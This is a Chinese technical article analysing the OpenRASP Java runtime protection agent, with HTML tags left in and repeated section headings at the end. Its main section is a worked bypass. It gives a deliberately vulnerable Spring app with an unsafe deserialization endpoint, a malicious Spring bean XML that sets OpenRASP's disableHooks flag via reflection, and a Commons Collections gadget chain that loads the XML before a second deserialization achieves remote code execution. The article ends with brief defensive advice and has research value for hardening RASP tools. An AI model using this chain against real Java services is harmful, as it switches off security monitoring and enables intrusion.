OpenRASP绕过实现与分析<\/h1>

一、OpenRASP基础原理<\/h2>

1.1 RASP工作机制<\/h3>
OpenRASP利用Javaagent机制实现防护：<\/p>
premain<\/code>：启动时加载agent<\/li>
agentmain<\/code>：启动后加载agent<\/li>
<\/ul>
初始化时会将rasp.jar<\/code>路径加载到Bootstrap类加载器。<\/p>
1.2 Bootstrap类加载器<\/h3>
核心特性<\/strong>：<\/p>

负责加载核心Java类库（位于<JAVA_HOME>\/lib<\/code>目录）<\/li>
使用本地代码（C\/C++）实现，Java中表示为null<\/li>
在双亲委派模型中位于最顶层<\/li>
<\/ul>
工作流程<\/strong>：<\/p>

JVM启动时首先加载核心类库<\/li>
类加载请求首先委派给Bootstrap类加载器<\/li>
找不到时依次向下委派（Extension ClassLoader → Application ClassLoader）<\/li>
<\/ol>
1.3 双亲委派机制<\/h3>
类加载器收到请求时的处理流程：<\/p>

检查类是否已加载<\/li>
未加载则委托父类加载器处理<\/li>
父类无法加载时才自行尝试加载<\/li>
<\/ol>
类加载器层级<\/strong>：<\/p>

Bootstrap ClassLoader（核心类库）<\/li>
Extension ClassLoader（扩展库）<\/li>
Application ClassLoader（应用类）<\/li>
<\/ol>
二、OpenRASP防护实现<\/h2>
2.1 关键设计<\/h3>
OpenRASP将rasp.jar<\/code>加入Bootstrap类加载器搜索路径的原因：<\/p>

当hook由BootstrapClassLoader加载的类（如java.io.File<\/code>）时<\/li>
无法从该类调用非BootstrapClassLoader加载的类<\/li>
通过appendToBootstrapClassLoaderSearch<\/code>方法将检测代码放入Bootstrap搜索路径<\/li>
<\/ul>
2.2 防护实现方式<\/h3>
通过hook关键类方法，在原始方法前插入检测逻辑：<\/p>
protected<\/span> void<\/span> hookMethod<\/span>(<\/span>CtClass ctClass)<\/span> throws<\/span> IOException,<\/span> CannotCompileException,<\/span> NotFoundException {<\/span>
<\/span><\/span>    String src;<\/span>
<\/span><\/span>    if<\/span> (<\/span>ctClass.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"ProcessImpl"<\/span>))<\/span> {<\/span>
<\/span><\/span>        if<\/span> (<\/span>OSUtil.<\/span>isWindows<\/span>())<\/span> {<\/span>
<\/span><\/span>            src =<\/span> this<\/span>.<\/span>getInvokeStaticSrc<\/span>(<\/span>ProcessBuilderHook.<\/span>class<\/span>,<\/span> "checkCommand"<\/span>,<\/span> "$1,$2"<\/span>,<\/span> 
<\/span><\/span>                    new<\/span> Class[]{<\/span>String[].<\/span>class<\/span>,<\/span> String.<\/span>class<\/span>});<\/span>
<\/span><\/span>            this<\/span>.<\/span>insertBefore<\/span>(<\/span>ctClass,<\/span> "<init>"<\/span>,<\/span> (<\/span>String)<\/span> null<\/span>,<\/span> src);<\/span>
<\/span><\/span>        }<\/span> else<\/span> if<\/span> (<\/span>ModuleLoader.<\/span>isModularityJdk<\/span>())<\/span> {<\/span>
<\/span><\/span>            src =<\/span> this<\/span>.<\/span>getInvokeStaticSrc<\/span>(<\/span>ProcessBuilderHook.<\/span>class<\/span>,<\/span> "checkCommand"<\/span>,<\/span> "$1,$2,$4"<\/span>,<\/span> 
<\/span><\/span>                    new<\/span> Class[]{<\/span>byte<\/span>[].<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>});<\/span>
<\/span><\/span>            this<\/span>.<\/span>insertBefore<\/span>(<\/span>ctClass,<\/span> "<init>"<\/span>,<\/span> (<\/span>String)<\/span> null<\/span>,<\/span> src);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span> else<\/span> if<\/span> (<\/span>ctClass.<\/span>getName<\/span>().<\/span>contains<\/span>(<\/span>"UNIXProcess"<\/span>))<\/span> {<\/span>
<\/span><\/span>        src =<\/span> this<\/span>.<\/span>getInvokeStaticSrc<\/span>(<\/span>ProcessBuilderHook.<\/span>class<\/span>,<\/span> "checkCommand"<\/span>,<\/span> "$1,$2,$4"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>byte<\/span>[].<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>});<\/span>
<\/span><\/span>        this<\/span>.<\/span>insertBefore<\/span>(<\/span>ctClass,<\/span> "<init>"<\/span>,<\/span> (<\/span>String)<\/span> null<\/span>,<\/span> src);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>最终调用V8引擎执行JS检测逻辑（official.js<\/code>）。<\/p>
三、OpenRASP绕过技术<\/h2>
3.1 关键漏洞点<\/h3>
RASP检查调用堆栈时会忽略自身类（com.baidu.openrasp.*<\/code>）：<\/p>

可以任意使用com.baidu.openrasp<\/code>包内的类<\/li>
如果这些类存在安全问题，可导致防护失效<\/li>
<\/ul>
3.2 绕过思路<\/h3>


直接关闭RASP<\/strong>：<\/p>

调用Config.getConfig().disableHooks(true)<\/code><\/li>
其他关闭方法也可行<\/li>
<\/ul>
<\/li>

利用危险类<\/strong>：<\/p>

查找com.baidu.openrasp<\/code>包内的危险类方法<\/li>
<\/ul>
<\/li>
<\/ol>
3.3 实际绕过案例<\/h3>
环境配置<\/h4>
FROM<\/span> goelhub\/java-openjdk-8u66:8.0<\/span>
<\/span><\/span><\/span><\/span>USER<\/span> root<\/span>
<\/span><\/span><\/span><\/span>COPY<\/span> .\/vulRASP.jar \/app\/vulRASP.jar
<\/span><\/span><\/span><\/span>COPY<\/span> rasp \/app\/rasp
<\/span><\/span><\/span><\/span>EXPOSE<\/span> 80<\/span>
<\/span><\/span><\/span><\/span>ENV<\/span> JAVA_OPTS=<\/span>"-javaagent:\/app\/rasp\/rasp.jar -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=:5005"<\/span>
<\/span><\/span><\/span><\/span>ENTRYPOINT<\/span> ["sh"<\/span>, "-c"<\/span>, "java $JAVA_OPTS -jar \/app\/easyRASP.jar"<\/span>]
<\/span><\/span><\/span><\/code><\/pre>漏洞应用代码<\/h4>
@PostMapping<\/span>({<\/span>"\/load"<\/span>})<\/span>
<\/span><\/span>public<\/span> String ser<\/span>(<\/span>@RequestParam<\/span> String data)<\/span> {<\/span>
<\/span><\/span>    try<\/span> {<\/span>
<\/span><\/span>        ObjectInputStream ois =<\/span> new<\/span> ObjectInputStream(<\/span>
<\/span><\/span>            new<\/span> ByteArrayInputStream(<\/span>Base64.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>data)));<\/span>
<\/span><\/span>        ois.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>        return<\/span> "RCE"<\/span>;<\/span>
<\/span><\/span>    }<\/span> catch<\/span> (<\/span>Exception e)<\/span> {<\/span>
<\/span><\/span>        return<\/span> e.<\/span>toString<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>@PostMapping<\/span>({<\/span>"\/upload"<\/span>})<\/span>
<\/span><\/span>public<\/span> String upload<\/span>(<\/span>@RequestParam<\/span>(<\/span>"file"<\/span>)<\/span> MultipartFile file)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>    File dir =<\/span> new<\/span> File(<\/span>"uploads"<\/span>);<\/span>
<\/span><\/span>    if<\/span> (!<\/span>dir.<\/span>exists<\/span>())<\/span> {<\/span>
<\/span><\/span>        dir.<\/span>mkdirs<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    File save_file =<\/span> new<\/span> File(<\/span>dir.<\/span>getAbsolutePath<\/span>()<\/span> +<\/span> File.<\/span>separator<\/span> +<\/span> 
<\/span><\/span>        UUID.<\/span>randomUUID<\/span>().<\/span>toString<\/span>().<\/span>toLowerCase<\/span>()<\/span> +<\/span> ".tmp"<\/span>);<\/span>
<\/span><\/span>    file.<\/span>transferTo<\/span>(<\/span>save_file);<\/span>
<\/span><\/span>    return<\/span> "文件缓存在:"<\/span> +<\/span> save_file.<\/span>getAbsolutePath<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>利用步骤<\/h4>

上传恶意XML<\/strong>（hackerbean.xml<\/code>）：<\/li>
<\/ol>
<beans<\/span> xmlns=<\/span>"http:\/\/www.springframework.org\/schema\/beans"<\/span>
<\/span><\/span>       xmlns:xsi=<\/span>"http:\/\/www.w3.org\/2001\/XMLSchema-instance"<\/span>
<\/span><\/span>       xsi:schemaLocation=<\/span>"http:\/\/www.springframework.org\/schema\/beans http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd"<\/span>><\/span>
<\/span><\/span>    <bean<\/span> id=<\/span>"configClass"<\/span> class=<\/span>"java.lang.Class"<\/span> factory-method=<\/span>"forName"<\/span>><\/span>
<\/span><\/span>        <constructor-arg<\/span> value=<\/span>"com.baidu.openrasp.config.Config"<\/span>\/><\/span>
<\/span><\/span>    <\/bean><\/span>
<\/span><\/span>    <bean<\/span> id=<\/span>"configInstance"<\/span> class=<\/span>"org.springframework.beans.factory.config.MethodInvokingFactoryBean"<\/span>><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"targetClass"<\/span> value=<\/span>"com.baidu.openrasp.config.Config"<\/span>\/><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"targetMethod"<\/span> value=<\/span>"getConfig"<\/span>\/><\/span>
<\/span><\/span>    <\/bean><\/span>
<\/span><\/span>    <bean<\/span> id=<\/span>"disableHooksField"<\/span> class=<\/span>"org.springframework.beans.factory.config.MethodInvokingFactoryBean"<\/span>><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"targetObject"<\/span> ref=<\/span>"configClass"<\/span>\/><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"targetMethod"<\/span> value=<\/span>"getDeclaredField"<\/span>\/><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"arguments"<\/span>><\/span>
<\/span><\/span>            <list><\/span>
<\/span><\/span>                <value><\/span>disableHooks<\/value><\/span>
<\/span><\/span>            <\/list><\/span>
<\/span><\/span>        <\/property><\/span>
<\/span><\/span>    <\/bean><\/span>
<\/span><\/span>    <bean<\/span> id=<\/span>"accessibleSetter"<\/span> class=<\/span>"org.springframework.beans.factory.config.MethodInvokingFactoryBean"<\/span>><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"targetObject"<\/span> ref=<\/span>"disableHooksField"<\/span>\/><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"targetMethod"<\/span> value=<\/span>"setAccessible"<\/span>\/><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"arguments"<\/span>><\/span>
<\/span><\/span>            <list><\/span>
<\/span><\/span>                <value><\/span>true<\/value><\/span>
<\/span><\/span>            <\/list><\/span>
<\/span><\/span>        <\/property><\/span>
<\/span><\/span>    <\/bean><\/span>
<\/span><\/span>    <bean<\/span> id=<\/span>"disableHooksSetter"<\/span> class=<\/span>"org.springframework.beans.factory.config.MethodInvokingFactoryBean"<\/span>><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"targetObject"<\/span> ref=<\/span>"disableHooksField"<\/span>\/><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"targetMethod"<\/span> value=<\/span>"set"<\/span>\/><\/span>
<\/span><\/span>        <property<\/span> name=<\/span>"arguments"<\/span>><\/span>
<\/span><\/span>            <list><\/span>
<\/span><\/span>                <ref<\/span> bean=<\/span>"configInstance"<\/span>\/><\/span>
<\/span><\/span>                <value<\/span> type=<\/span>"boolean"<\/span>><\/span>true<\/value><\/span>
<\/span><\/span>            <\/list><\/span>
<\/span><\/span>        <\/property><\/span>
<\/span><\/span>    <\/bean><\/span>
<\/span><\/span><\/beans><\/span>
<\/span><\/span><\/code><\/pre>
利用CC链加载XML关闭RASP<\/strong>：<\/li>
<\/ol>
\/\/ 使用InstantiateFactory和FactoryTransformer
<\/span><\/span><\/span><\/span>InstantiateFactory instantiateFactory =<\/span> new<\/span> InstantiateFactory(<\/span>
<\/span><\/span>    FileSystemXmlApplicationContext.<\/span>class<\/span>,<\/span>
<\/span><\/span>    new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span>
<\/span><\/span>    new<\/span> Object[]{<\/span>"file:\/\/\/uploads\/7921b36b-35c0-466f-8332-b80ba2fff3ff.tmp"<\/span>}<\/span>
<\/span><\/span>);<\/span>
<\/span><\/span>FactoryTransformer factory =<\/span> new<\/span> FactoryTransformer(<\/span>instantiateFactory);<\/span>
<\/span><\/span>Map map =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>hashMap,<\/span> factory);<\/span>
<\/span><\/span>TiedMapEntry tMapEntry =<\/span> new<\/span> TiedMapEntry(<\/span>map,<\/span> "a"<\/span>);<\/span>
<\/span><\/span>BadAttributeValueExpException bad =<\/span> new<\/span> BadAttributeValueExpException(<\/span>new<\/span> Object());<\/span>
<\/span><\/span><\/code><\/pre>
二次反序列化执行RCE<\/strong>：<\/li>
<\/ol>

使用常规CC链（如CC6）执行命令<\/li>
<\/ul>
Spring XML加载方式<\/h4>

ClassPathXmlApplicationContext<\/code>：从类路径加载<\/li>
FileSystemXmlApplicationContext<\/code>：从文件系统加载<\/li>
XmlBeanFactory<\/code>：从类路径或文件系统加载<\/li>
<\/ol>
四、防御建议<\/h2>

加强com.baidu.openrasp<\/code>包内类的安全审计<\/li>
对自身类的调用也应进行安全检查<\/li>
避免直接暴露危险的反序列化接口<\/li>
实施最小权限原则，限制敏感操作<\/li>
<\/ol>
五、参考资源<\/h2>

OpenRASP核心源码浅析<\/a><\/li>
OpenRasp分析<\/a><\/li>
<\/ol>
OpenRASP绕过实现与分析<\/h1>

一、OpenRASP基础原理<\/h2>

二、OpenRASP防护实现<\/h2>

3.3 实际绕过案例<\/h3>

五、参考资源<\/h2> OpenRASP核心源码浅析<\/a><\/li> OpenRasp分析<\/a><\/li> <\/ol>

五、参考资源<\/h2>

OpenRASP核心源码浅析<\/a><\/li>
OpenRasp分析<\/a><\/li> <\/ol>
